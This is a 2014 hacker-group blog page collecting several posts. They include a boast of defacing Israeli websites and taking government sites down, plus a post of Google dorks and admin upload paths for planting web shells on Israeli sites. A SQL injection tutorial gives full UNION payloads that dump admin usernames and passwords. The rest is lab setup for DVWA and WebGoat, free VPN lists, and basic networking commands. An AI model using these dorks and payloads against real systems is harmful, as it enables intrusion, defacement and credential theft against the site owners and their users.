Latest Posts
Showing posts with label html injection. Show all posts
Showing posts with label html injection. Show all posts

14 July 2014

#opSaveGaza / #opIsrael -- Ultimate Hackers

You Can Burn Our Mosques, Our Homes , 

* Our Schools And Whatever You Want  

 But !

* Our Sprit Will Never Die!  

* We Will Never Go Down! * Stop Killing Innocents



#opSaveGaza / #opIsrael

 

[Some Israel websites hacked]


http://bodyguard.co.il/save_gaza.html
http://text2join.co.il/save_gaza.html
http://derech-eretz.co.il/save_gaza.html
http://warranty.roltime.co.il/save_gaza.html
http://frogs.co.il/save_gaza.html
http://psychoblog.co.il/save_gaza.html
http://www.3access.com/index.html


[Gov + UseFul Sites Down]

 

http://gov.il

http://mossad.gov.il

http://health.gov.il

http://bankmassad.co.il

http://act.co.il

http://president.gov.il

http://kranoth.org.il

http://mfa.gov.il 

http://investinisrael.gov.il

http://agri.gov.il

http://wiezmann.ac.il


and many more!


./Ultimate hackers


Greetz to : 1337kh4n , 4n0nkh4n ,r007 ,d4rk1337 ,Cyb3rd0n ,baby<3 And all other Ultimate Hackers Members!


#-Proof









 




 

Read more ...

13 July 2014

Testing Your Sql injection Skills (Create Your Own Penetration Testing Lab)

Hello Guys

Its me 4n0nkh4n

This Tutorial is about testing your knowledge about sql injection.


If you dont know about sql injection . 

Read these topics first :   1. Step by step Sql Injection

                                          2. String Based Sql Injection

 

So Come to the topic now :p

 if you have knowledge of sql injection n you wanna test it

or you wanna practice sql injection attack 

 

                  *Just go Here

 n there is many levels to solve :)


if you did it 

Then here is one more thing to do.

 

Create Your Own Penetration Testing Lab with DVWA :-

 

What is DVWA ?

Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.

Download DVWA Now

Download XAMPP Now

You need a XMAPP Software for this lab to run a DVWA on local server.

after downloading , install XAMPP as administrator. So now start the  Apache , MySql and Filezilla services. Sometimes if any other application is using the ports , it will give you error. like my case 443 port number is used by Vmware workstation. so just disable this services with task manager.

How-To-Install-Wordpress-on-Localhost-with-Xampp

Now extract the DVWA file that you downloaded from the above mentioned link. and paste in the C:\xampp\htdocs folder.

Create Your Own Penetration Testing Lab with DVWA

now navigate to https://127.0.0.1/dvwa and click on the Setup option to start the setup.

Create-Your-Own-Penetration-Testing-Lab-with-DVWA1

after setup enter the credentials username = admin and password = password to login.

Create-Your-Own-Penetration-Testing-Lab-with-DVWA2

now click on the Setup option and click on the Create Database option to create your database.

Create-Your-Own-Penetration-Testing-Lab-with-DVWA3

now your penetration lab ready for your security application testing .

Create-Your-Own-Penetration-Testing-Lab-with-DVWA4

Enjoy your Penetration Testing Lab with DVWA.

Hope you like my post.Create Your Own Penetration Testing Lab with DVWA. Dont be Selfish Please Share it with others. :p


#4n0nkh4n

./Ultimate_hackers

 

 

 

 


Read more ...

Israel Private 0Day Shell Upload Exploits ASP|PHP

Hey Guyz ..Today I found some FRESH Private Israel 0Day Exploits . So i thought of sharing with you all....So lets Start....
1). First 0Day Shell Upload ASP | PHP

# Google Dork -|-
'prod1.aspx?pid=' site:il or You can also create your own Dork
# Exploit Upload 1 -|-
/admin/adminbanners.aspx
# Exploit Upload 2 -|- 
/admin/AdminPics.aspx
When you upload your asp or php shell just Check Code Source of the page you will see your url


2). Second 0day Upload

# Dork -|- 
inurl:/index.php?categoryID= site:il
inurl:/index.php?ukey=auth
inurl:/index.php?ukey=feedback
inurl:/index.php?ukey=pricelist
inurl:/index.php?ukey=auxpage_faq
inurl:/shop/index.php?categoryID=
inurl:ukey=product&productID=
# Exploit -|-
/published/common/html/xinha/plugins/ImageManager/manager.php
#‎Exploit‬ -|-
/published/common/html/xinha/plugins/ExtendedFileManager/manager.php

3). Third 0day Upload Blind Sql Injection

 This just Targets with havij or manually and admin page of the script is www.target.co.il/QAdmin
# Dork -|- 

intext:cybercity site:il
inurl:index.php?id= <-- Page 4
intext:medicine site:il
inurl:index.php?id= <-- page 2
Read more ...

09 July 2014

String Based SQL injection

What is String Based SQL injection and how to notice them?
To make this simple to understand, String Based SQL injection happens when the site is vulnerable to SQL injection but doesn't show us the results needed to be displayed after executing our SQLi query.
Common known issues that proves the site being vulnerable to String Based are:

Code:
"order by" doesn't work, example: order by 100--
"group by" doesn't work
"having 1=2" doesn't work
queries related to SQL injection doesn't work (will show a normal page even though site is vuln to SQLi)



Solution to this issue in order to hack a site with String Based SQL injection
The answer to this problem is by using the following format while trying to hack a site with SQLi
Code:
http://site.com/index.php?id=10' order by 1000--+
That will show us the error, hence displaying the results according to our query.
The point here is that we used the quote ' and the + sign in our query
Code:
id=X' order by--+

Alright that you've got the point lets try String Based on some of the other types of SQL injection shall we


String-Union Based SQL injection
1. Obtaining the number of columns (in this example, we'll use 10 columns)
Code:
http://www.site.com/index.php?id=234' order by 11--+
Results show error, so we'll assume as 10 columns, since it'll be an example for our process

2. Obtaining the Databases
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(schema_name,0x0a),7,8,9,10 from information_schema.schemata--+
Results will display the databases on their website
Note: If you don't know anything about UNION Based SQL injection, I suggest you read one of my tutorials to progress further in this step

3.Obtaining the Tables from the current Database
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(table_schema,0x0a),7,8,9,10 from information_schema.tables where table_schema=database()--+
Results will display the current table names
For this example, we'll be using the table name: "admin"

4.Obtaining Column names from a specific table (which in this example is "admin")
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(column_name,0x0a),7,8,9,10 from information_schema.columns where table_name=0x61646d696e--+

Results will display the column names from the current table
To convert plain text to hex, use: http://www.swingnote.com/tools/texttohex.php

For this example, we'll use "username" and "password" as our column names

5.Obtaining Data from Column names
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(username,0x3a,password,0x0a),7,8,9,10 from admin--+

Results will display the data given by the columns you have chosen

This can be also done with Error Based SQL injection, Blind Based and other types of SQL injection
Read more ...

Top 10 Free Vpn Services!!!



Top 10 Free VPN Servies
First of all, lets talk about what a VPN is.
VPN simply means “Virtual Private Network”. Basically it’s a private network which lets users to connect to other users or remote sites using a public network usually internet. It uses “virtual” connections routed through the Internet from the company’s private network to the remote site or employee instead of physical connections. In short , it is private network constructed within a public network infrastructure, such as the global Internet.
Why You Need VPN

To protect privacy, either on a LAN or a public hotspot.
Anonymous Internet Surfing Full anonymity by hiding your real IP address.
Bypass geographical blocks from certain websites Unlike a proxy, you get secured connection for all programs you are using Quality Network ensures your VPN service will be fast wherever you are in the world Protection against your ISP Bypass ISP Blocking for VOIP Applications like Skype.

Top 10 Free VPN Servies
1. UltraVPN
(https://www.ultravpn.fr/) It is a free VPN client/ server SSL VPN solution based on OpenVPN. It encrypts and anonymizes your network connection making your connection safe and secure. You need to download and install the client and create a (username, password) to use this service.
2. Logmein Hamachi
( https://secure.logmein.com/products/hamachi2/download.aspx )
It’s a great free VPN service from the well known guys who are behind the Logmein Service of remote apps management. It’s free for non-commercial and personal use. Features : No hardware required – A quick, simple and easy-to-use VPN that just works Secure communications – Encrypted tunneling across public and private networks Flexible networking – Combines the ease of an SSL VPN with the connectivity of an IP-sec VPN Web-based management – Deploy to anyone, manage from anywhere, access anytime Free for non-commercial usage – Absolutely free for non- commercial use.
3. Packetix
(http://www.packetix.net/en/)
Its a japanese free VPN solution with technology developed by SoftEther Corporation.You can use PacketiX.NET online test service for free.Here’s what you can do with this service. You can create your private Virtual VPN Hub. You can configure and use the hub for free.You can use all functions the PacketiX VPN software has to offer, such as creating a remote connection to your home network or uniting local networks at different sites. With our system, you won’t need to set up a VPN server with a global IP address yourself. The VPN server administration is done over an easy web interface.
4. Open VPN
( http://openvpn.net/index.php/opensource/downloads.html )
Open VPN drives UltraVPN, OpenVPN is a SSL/TLS based VPN, it provides high security and privacy. The biggest difference between PPTP VPN and OpenVPN is you need install OpenVPN client software to use OpenVPN service, and OpenVPN DO NOT work on mobile devices such as Iphone, Ipad Windows Mobile and Android. But OpenVPN works on Windows, Mac and Linux.
5. Your Freedom
( http://www.your-freedom.net/index.php?id=downloads )
This one is basically not a VPN service but its performs almost the same function with great ease, hence i included this in this list. It provides both a free and paid service. Free service limits to six hours of usage per day (up to 18 hours per week). You need to install a client on your system and a user name & password to use this.
6. Macro VPN
(http://www.macrovpn.com/)
Just like other services MacroVPN offer free VPN service for the user’s, it provides 128bit PPTP encrypted VPN Connection Service, protection on wifi hotspot. Normally assigned US based IP’s.
7. Hotspot Shield
( http://hotspotshield.com/?lg=en)
Hotspot Shield is a free VPN service which protects your entire web surfing session; securing your connection at both your home Internet network & Public Internet networks (both wired and wireless) . Hotspot Shield protects your identity by ensuring that all web transactions (shopping, filling out forms, downloads) are secured through HTTPS.Here also, you need to download and install a client to use it on your computer.
8. Its Hidden
(http://itshidden.com/)
Itshidden is part of Port 80 Limited(Seychelles) company providing both free VPN and paid services of VPN It creates a secure connection encrypting all the data protecting your privacy and securing you. You dont need to install any software. ItsHidden.com works on all Platforms including Windows, Mac, Linux, IPhone etc
9. CyberGhost
(http://cyberghostvpn.com/)
This a free VPN service from Germany which helps you route you through a German IP. The free service is limited to 10GB traffic every month, which is more than enough for surfing on websites, chatting and email.
10. Gpass
( http://gpass1.com/gpass/)
This is another free VPN service product of the World’s Gate, Inc which offers Internet solutions for information freedom in China and other regions. You need to install a software client to use this.
Read more ...

08 July 2014

Secure Your PC by using Image as Login Password

In this post i am sharing a new way you can set password for your laptop or PC if you are using Windows 8. You can secure your Computer Easily by using Image as password for your Login. Yes, It is possible now,
In windows 8 you can Use image as your password. Using Text password is old and Boring way, Why not try something different. Their are many benefits of using Image as wallpaper, most important is that it is more secure than any text password. Read The full Post, I have mentioned Each step that you can follow to change or Use Any picture as Password. Using Image Gesture is very easy to use in windows 8




Steps To Create a Picture Password for Windows 8 :


Step 1: First Step is to creating a text password. Press Win key + I , Then click on Change PC settings. Than you will see an option of Create password below Sign-in Options. Just click on create password and Type any safe password for you.

Step 2: Now a new option for Create a picture password will be visible to you. Like in Below given Screenshot. Just Tap on it and choose a New Picture you want to set as password


2014-06-12_17h01_10

 Step 3: Now the Third Step is very important. You have to Make 3 Gestures on the picture you choose as password for your PC. Making Gesture is very Easy, but you have to keep that gesture in your mind as that gesture will allow you to login in your PC after setting picture as password. You can make a line, circle or box or anything. But Make it easy to remeber. You can check below screenshot. This arrow is my first gesture.

2014-06-12_17h05_12

Also Check :   Setting Up Port Forwarding In Router :D

Step 4: Now Click on next and Make another gesture. You have to make 3 gesture.  After Making Click Save.

Its done, Now you had set an picture as password for your window 8. If you like this article, comment below and Support me to bring such more interesting Article for you.

Below given screenshot is the 3 gestures i have used for my password. You can also create any gesture like me.

               2014-06-12_17h06_48
Read more ...

30 June 2014

Top 10 basic networking commands in linux/unix

Networking is an essential part Unix and it offer lots of tools and command to diagnose any networking problem. When I was working on FIX Protocol we get lot of support queries to see whether FIX Sessions are connected or not. Since FIX Protocol uses sockets you can use net stat , telnet and other networking command available in Linux for finding problem and solve that.In this article I will show you basic networking commands in Unix and for what purpose they are used. with the combination of grep and find command on them you can troubleshoot most of networking problem

Networking Commands Example in Unix and Linux

These are most useful commands in my list while working on Linux server , this enables you to quickly troubleshoot connection issues e.g. whether other system is connected or not , whether other host is responding or not and while working for FIX connectivity for advanced trading system this tools saves quite a lot of time
  • finding host/domain name and IP address - hostname
    • test network connection – ping
    • getting network configuration – ifconfig
    • Network connections, routing tables, interface statistics – netstat
    • query DNS lookup name – nslookup
    • communicate with other hostname – telnet
    • outing steps that packets take to get to network host – traceroute
    • view user information – finger
    • checking status of destination host - telnet

Example of Networking commands in Unix

let's see some example of various networking command in Unix and Linux. Some of them are quite basic e.g. ping and telnet and some are more powerful e.g. nslookup and netstat. When you used these commands in combination of find and grep you can get anything you are looking for e.g. hostname, connection end points, connection status etc.


hostname

hostname with no options displays the machines host name
hostname –ddisplays the domain name the machine belongs to
hostname –fdisplays the fully qualified host and domain name
hostname –idisplays the IP address for the current machine


ping
It sends packets of information to the user-defined source. If the packets are received, the destination device sends packets back. Ping can be used for two purposes

1. To ensure that a network connection can be established.
2. Timing information as to the speed of the connection.

If you do ping www.yahoo.com it will display its IP address. Use ctrl+C to stop the test.

ifconfig
View network configuration, it displays the current network adapter configuration. It is handy to determine if you are getting transmit (TX) or receive (RX) errors.


netstat
Most useful and very versatile for finding connection to and from the host. You can find out all the multicast groups (network) subscribed by this host by issuing "netstat -g"

netstat -nap | grep portwill display process id of application which is using that port
netstat -a or netstat –allwill display all connections including TCP and UDP
netstat --tcp or netstat –twill display only TCP connection
netstat --udp or netstat –uwill display only UDP connection
netstat -gwill display all multicast network subscribed by this host.

nslookup
If you know the IP address it will display hostname. To find all the IP addresses for a given domain name, the command nslookup is used. You must have a connection to the internet for this utility to be useful.
E.g. nslookup blogger.com

You can also use nslookup to convert hostname to IP Address and from IP Address from hostname.

traceroute
A handy utility to view the number of hops and response time to get to a remote system or web site is traceroute. Again you need an internet connection to make use of this tool.


finger
View user information, displays a user’s login name, real name, terminal name and write status. this is pretty old unix command and rarely used now days.

telnet
Connects destination host via telnet protocol, if telnet connection establish on any port means connectivity between two hosts is working fine.
telnet hostname port will telnet hostname with the port specified. Normally it is used to see whether host is alive and network connection is fine or not.
Read more ...

29 June 2014

Free VPN • 100% Free PPTP and OpenVPN Service

Vpnbook



Free Open Vpn And PPTP
Surf Anonymously
100% Free Vpn Service

PPTP VPn :

  • Free PPTP VPN Account (Easy to setup, no need to download any software, works with all Windows, Mobile and PS3 Devices)
    • Server #1: euro195.vpnbook.com
    • Server #2: euro213.vpnbook.com
    • Server #3: uk180.vpnbook.com (UK VPN - optimized for fast web surfing; no p2p downloading)
    • Server #4: us1.vpnbook.com (US VPN - optimized for fast web surfing; no p2p downloading)
    • Server #5: us2.vpnbook.com (US VPN - optimized for fast web surfing; no p2p downloading)
    • Username: vpnbook
    • Password: spa5urEp
    • More servers coming...

OpenVPn :


Read more ...

How Hackers Hack Any Account Using Authenticaion Flaw - 2nd Part


                         Hello, folks! after a short break i'm back with an interesting post, How Hackers Hack any account using Authentication Flaws - 2. You might had read my previous 1st part on Authentication Flaws, it is amazing article for beginners who wants to learn basic about Authentication Flaws. So today we'll learn second method of Authentication, well there are many methods lets explore this Basic one.


Requirements :

Short Description and Explanation : I'd already gave all explanation of Authentication flaws in previous post, today we'll learn another method of Authentication Flaw. As from the beginning i m telling finding authentication flaw in website is little harder, researcher or hacker need to understand how web application, server, and other protocols are communicating with each others, Always remember that HTTP is stateless protocol it is like artificial intelligence it works same as developer programmed it. If you've good knowledge of Web technology, Application, Programming and hacking so you can understand how it is working & then you'll be able to find it's vulnerable point & Exploit it.


Multi Level Login Authentication Flaw Exploitation :

  • Start WebGoat Click on Authentication Flaws > Multi-Level Login 2
    Click on Image to Enlarge it

  • You can see that red highlighted text : It is explanation of this flaw read it properly it is important, and Go on next step.
So, assume that you're an attacker and you've an active account on WebGoat website with the username : Joe and Password : banana but your main target is to get into Jane's account without her knowledge, so you've to find that flaw and exploit it to get into her account. So let's do it. First of all lets understand how the server authenticating users and allowing them to access private information, Remember Tokens : (#TAN) is mostly in all websites but in different methods and logic.


  • Start Burp Suite : Setup Proxy connection between client (Browser) and server so you can easily intersect any request sent from client.
  • Back to WebGoat : Type Username and password and Hit Submit.

  • Analyze every request and response from Client and Server, and look for something that looks little suspicious. (Just for your knowledge)
    Click on Image to Enlarge it
    (Intercepting Client's request in Burp)
  • There you can clearly see application is using Post based form and by analyzing that we didn't got anything pretty interesting because its simple Post Based Form, i thought may be it is vulnerable to SQL injection but it's Authentication Flaw tutorial. Lets Look at server response message.
    Click on Image to Enlarge it

  • Same here nothing pretty interesting, it just leaked server information which is really very useful and juicy information for hackers to find more vulnerabilities components in Web Server. This is also called Fingerprinting victim OS.
  • Go back to browser and you'll see it is asking for Token (TAN). It says enter TAN #1 so here TAN 1 is 15161, lets do this also and analyze the application working method to get vulnerable point.

  • Let's look at request we intercepted into Burp Suite and here is only vulnerable point, please guys try to understand little from yourself also - don't only depend upon tutorial. Try to understand how it is validating and how server knows which user has to be logged in.
    Click on Image to enlarge it

  • Go Back to browser and see it allowed you to access your private information such as credit card info and number.
    Click on Image to enlarge it
  • Wow! now the question is how Server got to know i should allow this client to access Joe information, once again look back into second request you intercepted into Burp Suite. (That TAN Request)

    Click on Image to enlarge it

  • Cool, please check above image properly and read that 3 lines properly to understand The Vulnerable point of this application.
  • Now the question is : How does Server knows which user has to be logged in ? .. Come-on lets change username value from Joe to Jane in TAN request. Again you've to go back to Multi-Level login and login with Joe Username and password, when it comes to TAN - enter TAN and capture request in Burp Suite and Change username Joe to Jane (You can also use Burp Suite Repeater to repeat same request) and Server will get confused with this request and you'll easily allowed to access Jane confidential data and information.
    Click on Image to enlarge it

  • Send that request and check response in Web Browser, you'll be in Jane's account without any password or Social engineering you hacked Jane's account, this is called Multi-Level login Authentication Flaw.

Every Web Application works in their own logic and method just you need to understand that how Web Application and Server is validating the user and allowing them to access private information. Here developers left great flaw in Validating users, if they'd used password over TAN verification also then there would no authentication flaw because we don't know Jane's password, but mostly web developers don't connect their database to every application in fear of SQL Injection or any other Attack.



Thank you for reading my post, if you've got any doubt please free to comment and let me know your problem. If you liked it please share it and increase us. - 

#Copied
Read more ...
Designed By Published.. Blogger Templates